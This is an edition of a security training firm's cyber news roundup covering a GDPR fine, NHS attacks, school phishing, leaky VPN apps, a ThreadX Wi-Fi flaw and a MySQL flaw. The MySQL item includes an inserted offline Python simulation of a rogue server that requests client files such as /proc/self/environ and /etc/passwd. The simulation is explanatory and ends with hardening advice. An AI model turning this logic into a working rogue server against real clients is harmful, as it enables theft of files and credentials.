Cyber Security Training from QA

Cyber Pulse: Edition 50

Read the latest edition of Cyber Pulse, our roundup of Cyber news.


25 January 2019

Google Fined €50 Million ($57 Million) by France for GDPR Breach

The Commission nationale de l'informatique et des libertés (CNIL), the French regulator for personal data and privacy law, on Monday fined Google €50 million (about $57 million). CNIL found that the tech giant had not been transparent enough about how it uses personal data: in the regulator's words, Google made it unclear for users to understand how their data was used for targeted advertising. Since the EU General Data Protection Regulation (GDPR) came into force in May 2018, CNIL has enforced its requirements closely. GDPR focuses on transparency from companies that collect data, which must explain clearly what they collect and how they use it, and on obtaining valid consent for data processing and sharing. Companies in and outside the EU have reorganised their businesses to meet GDPR's standards, and although Google made changes to its offerings, CNIL judged that they still fell short of the user data privacy requirements set out in GDPR. The restricted committee of CNIL which heard the matter stated that "the users’ consent is not sufficiently informed". "The information on processing operations for the ads personalization is diluted in several documents and does not enable the user to be aware of their extent," the committee added. The committee further observed that the consent collected was neither “specific” nor “unambiguous”.

NHS in Cumbria Victim of More Than 150 Cyberattacks in 5 Years

The NHS in Cumbria, UK appears to have become a frequent target for cybercriminals in recent years. Figures released under a Freedom of Information (FOI) request and obtained by BBC News show that the University Hospitals of Morecambe Bay NHS Trust (UHMBT) recorded 147 cyber attacks in the past five years. Part of the explanation is that the trust reports diligently: Lee Coward, Head of IT at UHMBT, said the trust has a ‘rigorous’ reporting process, which leads it to log a higher volume of identified cyber 'attacks' than other organisations would. Coward added that a significant amount of money had been spent on keeping its IT systems safe. Iain Stainton, Senior Lecturer in Policing and Criminology at the University of Cumbria, described the number of attacks as ‘extraordinary’, noting that the National Cyber Security Centre records an average of 10 attacks per week across the whole of the UK. The NHS has previously been criticised for under-investing in cyber security: a separate FOI found that the lowest-spending trust had put as little as £238 (roughly £250) into data security training in a year. “The average spend on data security training across 159 Trusts surveyed was £5,356 in the last 12 months, but this ranged widely from between £238 and £78,000 with no correlation to the size of Trust, or its location,” that FOI found.

Cybercriminals Target Private School in Newcastle With Phishing

Cybercriminals recently tried to scam the parents of pupils at a private school by inviting them to pay school fees in bitcoin in exchange for a discount. The target of this latest phishing attack was the Royal Grammar School (RGS) in Jesmond, Newcastle. The school has warned parents to be wary of further fraudulent emails about payments, and headmaster John Fern told the affected families that the scam had been reported to the police. The Information Commissioner’s Office (ICO), which is looking into the incident, said other schools are also likely to be targeted. “[We are] aware of other phishing type attacks that have been targeted towards schools. Royal Grammar School has made us aware of an incident and we will assess the information provided,” the ICO told the media. The phishing emails contained spelling, grammatical and punctuation errors, and offered discounts to anyone who paid in bitcoin or other cryptocurrencies. “We are aware that parents have received an email claiming you'll receive a 25% discount on fees for passing over details or claiming that you can now pay by bitcoin/cryptocurrency. Please note these are phishing emails and should not be opened or any links clicked. We are currently investigating this breach and information will be passed on to all parents in due course,” RGS said on its website.

Top Free VPN Apps Found Carrying User Privacy Bugs

A large number of free VPN apps on the Google Play Store have been found to put their users at risk. In a study of around 150 of the most popular free VPN Android apps, with over 260 million combined installs worldwide, more than a quarter leaked Domain Name System (DNS) queries: they tunnelled the user's traffic but let name lookups escape to the local network's resolver, exposing which sites the user visited. The study, conducted by Simon Migliano, Head of Research at Metric Labs’ Top10VPN.com, also found four apps that leaked data through WebRTC (a real-time communications API in browsers that can reveal a device's real IP address) and two more that leaked DNS data, IP addresses and WebRTC data. Scanning the 150 apps with Google’s VirusTotal flagged 27 of them as potential sources of malware. Two-thirds of the apps contained user privacy bugs, and some requested permissions with no place in a VPN, such as access to the device’s camera and microphone or the ability to send text messages. The one thing all of the apps did correctly was to establish an encrypted VPN connection. Network testing, however, showed that over half suffered performance problems such as packet loss, low bandwidth and excessive buffering. The ten most popular apps flagged as high risk were HotSpotShield Free, SuperVPN, Hi VPN, HotSpotShield Basic, Psiphon Pro, Turbo VPN, VPN Master, Snap VPN, Hola and Speed VPN, each with between 10 and 50 million downloads. None of them was flagged for malware, but every one had at least one of the core issues: risky permissions, risky functions or DNS leakage.

ThreadX Bug Puts Billions of Wi-Fi Enabled Devices at Risk

ThreadX, a real-time operating system (RTOS) widely used in consumer electronics, is believed to carry a serious flaw. The bug was discovered by Embedi, a firm specialising in security for embedded devices, whose researcher Denis Selianin has studied it extensively and published a detailed analysis. Selianin reverse-engineered the firmware of the Marvell Avastar wireless SoC, the chipset series that provides Wi-Fi in many devices, and found several vulnerabilities in it, one of them in the ThreadX component itself. “One of the discovered vulnerabilities was a special case of ThreadX block pool overflow. This vulnerability can be triggered without user interaction during the scanning for available networks. This procedure is launched every 5 minutes regardless of a device being connected to some Wi-Fi network or not. That’s why this bug is so cool and provides an opportunity to exploit devices literally with zero-click interaction at any state of the wireless connection (even when a device isn’t connected to any network).” explained Selianin. The researcher also highlighted a second vulnerability that applies to devices running a different ThreadX implementation from Avastar’s. Taken together, these vulnerabilities could be used to exploit the billions of Wi-Fi enabled devices powered by ThreadX. Selianin points out that wireless chips add attack surface to a device, and that bugs in the host-side device drivers could let an attacker who has compromised the Wi-Fi chip escalate to the host processor. At the time of writing the vulnerability is not fully mitigated in affected devices and no proper ThreadX patch has yet been released.

MySQL LOAD DATA LOCAL Flaw Leaves Client Files Out in the Open

A design flaw has been uncovered in the popular open-source RDBMS MySQL. Reported by several sources, the issue lies in the file transfer mechanism behind the ‘LOAD DATA LOCAL’ statement, which lets a client upload a file from its own host to the server. In the MySQL protocol it is the server that names the file: after the client sends a query, the server may reply with a request for a file path, and a compliant client sends that file's contents back. A rogue MySQL server can therefore answer any query, not just a LOAD DATA LOCAL statement, with a request for any file on the client host. As Security Affairs reports, an attacker who controls a server the client connects to can steal private data simply by knowing the file’s path, and can discover useful paths by first requesting the client process’s ‘/proc/self/environ’ file. It is also believed that the flaw was used by Magecart attackers to deploy malicious code in last year’s attacks. Security researcher Willem de Groot explains that Adminer, a PHP tool for managing MySQL and PostgreSQL databases, is the client most often abused: an attacker points an exposed Adminer instance at a rogue server, which then reads files from the web server hosting Adminer. “AFAIK this attack method has not been published before, but in hindsight, I have observed it being used by different Magecart factions at least since October 2018. The vulnerability was subsequently used to inject payment skimmers on several high-profile stores (government & multinationals).” wrote de Groot of Adminer’s misuse. Because the data flows from the client host to the attacker’s server, the flaw gives attackers a file transfer out of the victim’s server in addition to whatever the database itself exposes. When using a tool like Adminer, de Groot advises running an up-to-date version and protecting it with measures such as password protection.
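The exchange described above, as an added example that is not code from this newsletter, from MySQL or from Adminer: the packet framing (3-byte length, 1-byte sequence id) and the 0xFB "send me this file" marker follow the MySQL client/server protocol, while the client logic, the `run_exchange` driver and the in-memory `SAMPLE_FS` "disk" are constructed stand-ins so the round trip runs offline. The only thing standing between the rogue server and the file is whether the client advertised the `CLIENT_LOCAL_FILES` capability, which is what the `local_infile` client setting controls.

```python
"""
Added example: a rogue MySQL server abusing LOAD DATA LOCAL, simulated in-process.
Packet framing and the 0xFB request marker follow the MySQL protocol; the client,
the driver and the in-memory filesystem are constructed stand-ins, not real mysql code.
"""

CLIENT_LOCAL_FILES = 0x80      # capability flag a client sets when local_infile is enabled
LOCAL_INFILE_MARKER = 0xFB     # first byte of a server "send me this file" response
CHUNK = 16                     # small chunk size so the multi-packet transfer is visible


def pack_packet(payload: bytes, seq: int) -> bytes:
    """MySQL wire packet: 3-byte little-endian length, 1-byte sequence id, payload."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def unpack_packets(buf: bytes):
    """Yield (seq, payload) for every complete packet in buf."""
    off = 0
    while off + 4 <= len(buf):
        length = int.from_bytes(buf[off:off + 3], "little")
        seq = buf[off + 3]
        payload = buf[off + 4:off + 4 + length]
        if len(payload) != length:
            raise ValueError("truncated packet")
        yield seq, payload
        off += 4 + length


def rogue_server_reply(client_query: bytes, seq: int, wanted_path: str) -> bytes:
    """Malicious server: answer ANY query with a LOCAL INFILE request for a file of its choosing.
    The query text is ignored; the client never issued LOAD DATA LOCAL."""
    return pack_packet(bytes([LOCAL_INFILE_MARKER]) + wanted_path.encode(), seq)


def client_handle_reply(reply: bytes, capability_flags: int, filesystem: dict) -> bytes:
    """Simulated client (constructed). Returns the packets it sends back to the server.
    filesystem maps path -> bytes and stands in for the client host's disk."""
    seq, payload = list(unpack_packets(reply))[0]
    if payload[:1] != bytes([LOCAL_INFILE_MARKER]):
        return b""                                   # ordinary result set: nothing to upload
    if not capability_flags & CLIENT_LOCAL_FILES:
        # local_infile disabled: refuse, sending only the empty packet that ends a transfer
        return pack_packet(b"", seq + 1)
    # local_infile enabled: a trusting client streams whatever file the server named
    path = payload[1:].decode()
    data = filesystem.get(path, b"")
    out = b""
    for i in range(0, len(data), CHUNK):
        seq += 1
        out += pack_packet(data[i:i + CHUNK], seq)
    return out + pack_packet(b"", seq + 1)           # empty packet terminates the transfer


def server_collect_file(upload: bytes) -> bytes:
    """Server side: concatenate content packets until the empty terminator."""
    data = b""
    for _, payload in unpack_packets(upload):
        if not payload:
            break
        data += payload
    return data


def run_exchange(client_query: bytes, capability_flags: int, filesystem: dict, wanted: str) -> bytes:
    """Drive one round trip: client sends a query, rogue server answers with a file request,
    client responds, and the server returns whatever it managed to read from the client host."""
    reply = rogue_server_reply(client_query, seq=1, wanted_path=wanted)
    upload = client_handle_reply(reply, capability_flags, filesystem)
    return server_collect_file(upload)


# Constructed sample "disk" on the client host: a secret and the process environment
SAMPLE_FS = {
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
    "/proc/self/environ": b"HOME=/home/app\0DB_PASSWORD=hunter2\0",
}

if __name__ == "__main__":
    query = b"\x03SELECT 1"   # COM_QUERY; the client believes it is running a harmless query
    print(run_exchange(query, CLIENT_LOCAL_FILES, SAMPLE_FS, "/proc/self/environ"))
    print(run_exchange(query, CLIENT_LOCAL_FILES, SAMPLE_FS, "/etc/passwd"))
    print(run_exchange(query, 0, SAMPLE_FS, "/etc/passwd"))   # local_infile disabled: b""
```

The practical check is on the client side: run the command-line client as `mysql --local-infile=0` (or set `local-infile=0` in the `[client]` section of the option file) so the capability flag is never advertised, and treat any client, Adminer included, that can be pointed at an attacker-chosen hostname as a file-exfiltration path from the machine it runs on.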

Visit cyber.qa.com for more information on how QA can help solve the Cyber Security skills gap and subscribe to Cyber Pulse.

Useful links

Cyber Pulse: Edition 49

Cyber Pulse: Edition 48

Cyber Pulse: Edition 47

Cyber Pulse: Edition 46

Cyber Pulse: Edition 45

Cyber Pulse: Edition 44

Cyber Pulse: Edition 43

Cyber Pulse: Edition 42

Cyber Pulse: Edition 41

Cyber Pulse: Edition 40

Edited and compiled by

James Aguilan

Cyber Security Specialist

James Aguilan currently works as a Cybersecurity Researcher. He has provided upskilling and development to government agencies, national critical infrastructure operators and large corporations through cyber-attack simulation and forensic investigation workshops. Previously, James worked as a Data Consultant advising high-profile clients on how to handle their data in civil litigation or criminal investigations, notably on the largest merger between two US conglomerates, a deal worth $87 billion. He has also served as a Cybersecurity Consultant, responding to incidents and performing full forensic investigations. James holds a first-class honours degree in Computer Forensics and is working towards a Master's in Network Security and Penetration Testing.

Talk to our team of learning experts

Every business has different learning needs. QA has over 30 years of experience in combining the highest quality training with the most comprehensive range of learning services, ensuring the very best fit for your organisation.

Get in touch with our learning experts to talk about how we can help.